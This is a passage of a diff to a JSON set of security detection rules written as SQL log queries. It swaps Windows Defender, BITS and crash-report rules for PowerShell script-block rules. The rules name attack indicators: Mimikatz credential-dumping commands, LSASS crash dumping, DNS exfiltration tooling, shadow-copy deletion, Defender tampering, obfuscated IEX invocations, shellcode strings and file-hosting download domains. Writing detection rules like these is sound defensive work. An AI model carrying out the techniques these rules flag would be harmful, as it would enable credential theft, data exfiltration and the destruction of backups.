], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious 
changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": 
"bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and 
\"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - 
"id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use 
Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such 
as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') 
OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE 
'%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND 
ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - 
"title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 